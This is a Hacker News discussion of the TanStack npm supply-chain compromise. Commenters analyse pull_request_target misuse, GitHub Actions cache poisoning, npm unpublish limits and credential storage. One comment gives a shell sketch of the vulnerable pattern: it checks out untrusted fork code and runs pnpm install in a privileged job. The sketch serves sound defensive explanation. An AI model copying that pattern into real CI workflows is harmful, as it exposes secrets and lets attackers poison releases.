Yes, but the exploit was with GitHub Actions, not something that pnpm really prevented.
fabian2k 12 hours ago|||
Once you run your app with the updated dependencies, that code is executed anyway. And root or non-root doesn't matter; the important stuff is available to the user running the application regardless.
yetanotherjosh 11 hours ago||
How is this not a Github P0? Can anyone explain?

When I read that, I thought they must be using 'fork' wrong, and actually mean a branch on the official repo, as that can't be right!? Good lord.

sheept 5 hours ago|||
In some cases, you can also use forks to read commits from private forks[0], but GitHub considers these linked commit networks working as intended.

[0]: https://trufflesecurity.com/blog/anyone-can-access-deleted-a...

sozforex 3 hours ago||
This is a very worthy article. I have the impression that I read it before 2024, but maybe that was a different article describing the same mess with how GitHub exposes private repos.
edelbitter 6 hours ago||||
If git in general were to enforce pretending not to know about orphans, it would always need to know what boundary you meant, and/or you would end up waiting on useless duplicate network traffic. The fact that on GitHub such references are visible irrespective of the specified repo is not a bug, it's a feature. It's the tools (including but not limited to GitHub Actions) that cause dangerous misunderstanding, by appearing to let you specify something they then never actually enforce.

specified: repo location, slightly-difficult-to-preimage hash

intended meaning: use this hash if and only if it is reachable from the default branch of that repo

actual meaning: use this hash; start looking at this location. I do not care whether it is accessible through that location by accident, merely by intent of its uploader, or by explicit and persisting intent of someone with write access to the location.

cedws 3 hours ago||||
Because GitHub only cares about AI.
eviks 3 hours ago||
And maintaining high level of service availability!
rvz 1 hour ago||
With zero down time!
ZeWaka 11 hours ago|||
they probably used the publish token in a pull-request-target workflow or something?
ghost_pepper 10 hours ago||
yes, they used pull_request_target for a benchmarking suite. github has a huge warning saying to never use pull_request_target to run user code, but this is just going to keep happening
riknos314 9 hours ago|||
> github has a huge warning saying to never use pull_request_target to run user code

This is an area where documentation is necessary but not sufficient. Github needs to add some form of automated screening mechanism to either prevent this usage, or at the very least quickly flag usages that might be dangerous.

qudat 7 hours ago|||
And a labeling action which requires `pull_request_target`: https://github.com/actions/labeler#create-workflow

These types of features are not worth it and need to be removed from the marketplace.

crutchcorn 11 hours ago||
https://tanstack.com/blog/npm-supply-chain-compromise-postmo...

We (TanStack) just released our postmortem about this.

____tom____ 4 hours ago||
I didn't see a key section of a COE: "What are we doing to make sure this can't happen again?"

Apologies if I missed it. There's some discussion under what could have gone better, but prevention is key, and the report's not done without it.

dang 5 hours ago|||
(We changed the URL from https://github.com/TanStack/router/issues/7383 to that above.)
swyx 7 hours ago||
thank you for maintaining this inspiring ecosystem.
827a 10 hours ago||
Am I understanding this attack vector correctly: did TanStack have anything misconfigured on their GitHub, or make any mistakes that led to this happening? This is the second time, at least, that the GitHub Actions cache has been instrumental in a massive and widespread supply-chain compromise; what is going on over there?
ssanderson11235 9 hours ago||
The fundamental mistake here seems to have been not fully understanding the threat model of the pull_request_target action trigger.

pull_request_target jobs run in response to various events related to a pull request opened against your repo from a fork (e.g, someone opens a new PR or updates an existing one). Unlike pull_request jobs, which are read-only by default, pull_request_target jobs have read/write permissions.

The broader permissions of pull_request_target are supposed to be mitigated by the fact that pull_request_target jobs run in a checkout of your current default branch rather than on a checkout of the opened PR. For example, if someone opens a PR from some branch, pull_request_target runs on `main`, not on the new branch. The compromised action, however, checked out the source code of the PR to run a benchmark task, which resulted in running malicious attacker-controlled code in a context that had sensitive credentials.

The GHA docs warn about this risk specifically:

> Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.

They also further link to a post from 2021 about this specific problem: https://securitylab.github.com/resources/github-actions-prev.... That post opens with:

> TL;DR: Combining pull_request_target workflow trigger with an explicit checkout of an untrusted PR is a dangerous practice that may lead to repository compromise.

The workflow authors presumably thought this was safe because they had a block setting permissions.contents: read, but that block only affects the permissions for GITHUB_TOKEN, which is not the token used to interact with the cache. This seems like the biggest oversight in the existing GHA documentation/api (beyond the general unsafety of having pull_request_target at all). Someone could (and presumably did!) see that block and think "this job runs with read-only permissions", which wasn't actually true here.
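
In shell terms, the dangerous pattern boils down to something like this sketch (not the actual workflow):

    # pull_request_target job: runs with write access to the base repo's cache scope
    git fetch origin "pull/$PR_NUMBER/head"   # attacker-controlled code from the fork
    git checkout FETCH_HEAD
    pnpm install   # lifecycle scripts run attacker code; the store they poison gets cached for main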

user34283 3 hours ago|||
What I don't get is how the GitHub Action cache is shared between unprotected and protected refs. Is that really the case?

Why even have protected branch rules when anyone with write access to an unprotected branch can poison the Action cache and compromise the CI on the next protected branch run?

In GitLab CI caches are not shared between unprotected and protected runs.

consumer451 8 hours ago|||
From a GitHub product owner POV, if the architecture is not to be changed, what is the solution?

A big ugly warning in the UI?

Or, push back on the architecture?

Or, is threatening a big ugly warning in the UI actually pushing back on the architecture?

corvad 7 hours ago||
Many projects take a different approach where CI is not run on pull requests until maintainers approve it, even for very simple jobs, to avoid running untrusted code in CI.
corvad 7 hours ago||
At least, my naive brain wonders if blocking force pushes to main would have stopped this, as that is a setting in GitHub these days; unless I am misunderstanding the final attack vector, since it seems it was force pushed.
ezekg 9 hours ago||
> Unpublish was unavailable for nearly all affected packages because of npm's "no unpublish if dependents exist" policy. We have to rely on npm security to pull tarballs server-side, which adds hours of delay during which malicious tarballs remain installable

Per https://docs.npmjs.com/policies/unpublish:

> If your package does not meet the unpublish policy criteria, we recommend deprecating the package. This allows the package to be downloaded but publishes a clear warning message (that you get to write) every time the package is downloaded, and on the package's npmjs.com page. Users will know that you do not recommend they use the package, but if they are depending on it their builds will not break. We consider this a good compromise between reliability and author control.

I don't even know what to say here, npm.
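
For reference, the deprecation they recommend is a one-liner (package spec illustrative):

    # prints your warning on every install of the matched version(s) and on the npm page
    npm deprecate some-package@1.2.3 "malicious release, do not install"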

sophiabits 9 hours ago||
I do not envy the position the npm team are in. They removed the ability to unpublish packages as a response to the left-pad incident[1] because it wasn't desirable for individual developers to break downstream dependencies by pulling their package maliciously.

Of course the side effect is that now it's much harder to pull packages for legitimate reasons :/

[1] https://en.wikipedia.org/wiki/Npm_left-pad_incident

superfrank 6 hours ago|||
Maybe the next step is to give publishers a way to quarantine versions, with a warning that stops the install but lets users override it if they choose?

Give a publisher a way to tag a version as malicious, and then, in those hours between the exploit being noticed and the package being removed, anyone who tries to install it gets a message about that version being quarantined and asking whether they want to proceed.

It's not a perfect solution, but I think it's better than just waiting for npm to take action, without opening the door to another left-pad situation.

thayne 6 hours ago||||
I think cargo's yank is a good balance. It makes it difficult to pull the yanked version in as a dependency, but doesn't break existing usages, as long as the version is in the lockfile. And I think even then it gives you a warning that you are using a yanked package.
zarzavat 8 hours ago||||
The obvious solution is that unpublish should be available within a time window after a new version is published and then unavailable after that.
beart 7 hours ago||
There is a time window - https://docs.npmjs.com/policies/unpublish
zarzavat 7 hours ago||
Yes but they didn't do it properly. They only allow unpublishing if there are no dependants, which means it can't be used to pull a package version for security reasons.

It should be that within the first X hours you can pull a version regardless of dependants, after that you should need approval.

ummonk 8 hours ago|||
I mean they brought that incident on themselves...
igregoryca 8 hours ago|||
The baffling part is why it takes hours for the npm security team to unpublish packages that contain malware, as attested by multiple independent sources. That should happen in minutes.
linkregister 7 hours ago|||
It would take longer than minutes to validate the claims themselves.
consumer451 8 hours ago|||
Who vets the sources, and using what scheme?
tomjen3 6 hours ago||
If email matches owner of repo, pull now. If not verified, ban and restore later.
nabogh 8 hours ago||
Some sort of middle ground should have been found where the unpublished package is still accessible as an archive or something. I'd much rather get my package broken than get hacked
timwis 4 hours ago||
What do folks here do to avoid having plaintext credentials on disk? I try to use 1Password's plugins where I can. I find the SSH key (and git signing) experience flawless, but the CLI experience (e.g. the aws cli) pretty clunky - they often break, and they didn't even have a gcp plugin last I checked.
Myzel394 3 hours ago||
I'm not a huge fan of 1Password; there have been way too many issues with it in the past. If you're on a Mac, I can highly recommend checking out Secretive: https://github.com/maxgoedjen/secretive
timwis 3 hours ago||
Love that feeling when you read through a repo and think, "Wow, this looks cool," and go to star it, and see that you already have, and clearly forgot about it

Anyway, thanks for sharing. It doesn't look like it handles cli auth though (aws, npm, etc. all leave tokens sitting in your home directory). What do you use for those?

pprotas 1 hour ago||
`sops` combined with `age` is great! Benefit is that it doesn't tie you into 1Password's ecosystem
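
A minimal sketch of that combo (file names illustrative):

    age-keygen -o key.txt                                          # private identity; keep out of the repo
    sops --encrypt --age "$(age-keygen -y key.txt)" secrets.yaml > secrets.enc.yaml
    SOPS_AGE_KEY_FILE=key.txt sops --decrypt secrets.enc.yaml      # decrypt on demand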
timwis 1 hour ago||
That looks interesting, but unless I'm missing it, it still leaves you with things like ~/.aws/credentials in plaintext on disk, doesn't it?
Narretz 4 hours ago|
> Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main

IMO this shouldn't have been possible; the release should use its own cache and rebuild the rest fresh. It's one thing that the main <> fork boundary was breached, but the release process should have run fresh, without any caches. Of course, hindsight is 20/20.

d3ng 3 hours ago||
Yes, surely this caching mechanism is undocumented and unexpected behavior?

Looking at the affected workflow I don't see any explicit caching so this is all "magically under the hood" by GitHub?

This looks like a FU on GitHub, not TanStack (except for putting trust in GitHub in 2026, perhaps).

Yes, various footguns of pull_request_target are documented, but I don't believe this is one of them? GitHub needs to own this OR just deprecate and remove pull_request_target altogether.

From postmortem timeline: > 2026-05-11 11:29 Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main

Why was that scoped refs/heads/main?

This is the exploited version of the exploited workflow. Why does the result of preinstall scripts run on PRs here end up on the main branch? Or did I overlook some critical part of Actions docs or the TanStack actions?

https://raw.githubusercontent.com/TanStack/router/d296252f73...

d3ng 3 hours ago||
I take the above back. TanStack messed this up in the way they explicitly cache. This is run from the affected workflow: https://github.com/TanStack/config/blob/main/.github/setup/a...

The restore-key looks too wide, and this still looks like an issue. This wide caching may also cause issues if they ever upgrade the major Node.js version independently of the OS, for example.

user34283 2 hours ago||
On GitLab even if you set the same cache key it will not cross between unprotected and protected runs.

GitLab just adds a -protected suffix to the cache key.

It seems baffling that GitHub does not do this trivial separation, if I understand it correctly.

febusravenga 3 hours ago||
I think the more proper solution is to limit writes from untrusted actions: they shouldn't be allowed to update the cache, only read it (for perf reasons).